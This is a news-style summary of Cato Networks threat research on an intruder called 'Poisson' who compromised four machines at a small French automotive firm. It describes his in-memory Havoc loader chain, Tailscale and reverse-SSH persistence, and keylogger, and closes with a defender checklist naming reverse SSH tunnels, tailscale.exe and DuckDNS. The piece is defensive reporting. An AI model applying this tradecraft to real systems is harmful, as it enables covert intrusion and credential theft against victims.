339 commands over 33 days — that is the forensic breadcrumb trail Cato Networks captured after a French-speaking intruder left SSH keys and a step‑by‑step playbook in an open storage bucket, according to a write‑up by Cato CTRL researcher Vitaly Simonovich.
The intrusion timeline: 339 commands, 33 days
Cato Networks reconstructed a full operator session spanning 33 days and 339 commands. The actor, who uses the handle "Poisson," compromised a small French automotive business and controlled four machines. The attack ran largely in memory: a VBScript stager with a sandbox‑evasion delay decrypted a PowerShell loader, which fetched a .NET loader that ran Havoc's Demon agent without dropping the implant to disk. The operator worked on a schedule that looks like a student’s — active after 3 p.m. CET with a long midday gap — and relied on free‑tier services including DuckDNS, Backblaze B2, and an IONOS VPS in Berlin.
Tailscale and OpenSSH: a separate network door
On April 7, in a five‑hour overnight session, Poisson installed OpenSSH Server and Tailscale on a victim machine, joined it to his private Tailscale network, configured key‑based SSH, and created a reverse SSH tunnel. The next day, the Havoc command‑and‑control infrastructure went offline; Cato does not say why. That barely mattered: the Tailscale path sat on a separate mesh, encrypted and independent of the Havoc C2, and it preserved access. When the Havoc server returned on April 26, the agents reconnected automatically and the operator resumed activity through the end of April and into May.
Poisson’s tradecraft: tools, failures, and narrow objectives
The operator is not portrayed as an advanced persistent threat but as a junior operator with thin tradecraft. He leaked his home directory five times, named storage buckets after his handle, and left a test file of repeated keystrokes inside the keylogger package. He failed at roughly half of his attempts, yet still compromised four machines.
Poisson used a mixed toolset: scheduled tasks set to run at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom RustDesk build as a backup channel. Elevation attempts used Start‑Process -Verb RunAs — a visible UAC prompt that took up to a dozen tries on one victim across two days. The credential grabber was a 70‑line Python keylogger that saved keystrokes to a local file with no beacon or exfiltration server; Poisson manually logged in to retrieve credentials and used powercfg to prevent sleep so harvesting could continue uninterrupted.
His aims were narrow: banking logins, email passwords and government portal credentials. There was no Mimikatz, no observed lateral movement, no ransomware, and no clear evidence that the documents he browsed were exfiltrated. Two executables inside a file named Thales.zip ran for about 32 minutes in total late in the operation; Cato leaves their function unexplained.
Cato Networks’ detection checklist
- Alert on OpenSSH Server installations on Windows workstations — rare and suspicious in this environment.
- Watch for tailscale.exe on machines that have no reason to run a VPN.
- Look for ssh -R reverse tunnels connecting to external hosts.
- Flag wscript.exe running .vbs files out of user staging folders.
- Detect scheduled tasks set to highest privileges that launch script interpreters.
- Monitor for powercfg standby‑timeout changes that keep machines awake.
- Block DuckDNS.
What this means for small business owners, security teams, and adversaries
Small business owners: the attack targeted what people type — bank and email credentials — giving direct financial exposure even absent bulk document theft. The victim profile was a small automotive firm; the compromise shows how quickly credential harvesting can become a practical threat.
Security teams and technologists: takedown of a visible C2 is not remediation if the intruder has already built an independent access path. Cato’s checklist highlights specific telemetry to add to hunting playbooks — from unexpected OpenSSH installs on Windows to tailscale.exe and reverse SSH tunnels — and underscores that signed, legitimate binaries can defeat file‑based detection.
Adversaries: the episode demonstrates that inexpensive, legitimate services and free tiers can create resilient channels. Poisson’s use of Tailscale and signed binaries shows how an operator with modest skills can create persistence that outlives a conventional C2 takedown.
Vitaly Simonovich and Cato Networks’ reconstruction ends with a stark operational lesson: "pulling a C2 server offline is not remediation if the attacker has already built a separate door." The unanswered but practical question — what those two programs in Thales.zip actually did during their 32 minutes of execution — remains. In the meantime, defenders must treat a found C2 as a starting point, not the finish line, and hunt for the quiet persistence layers that keep attackers returning.
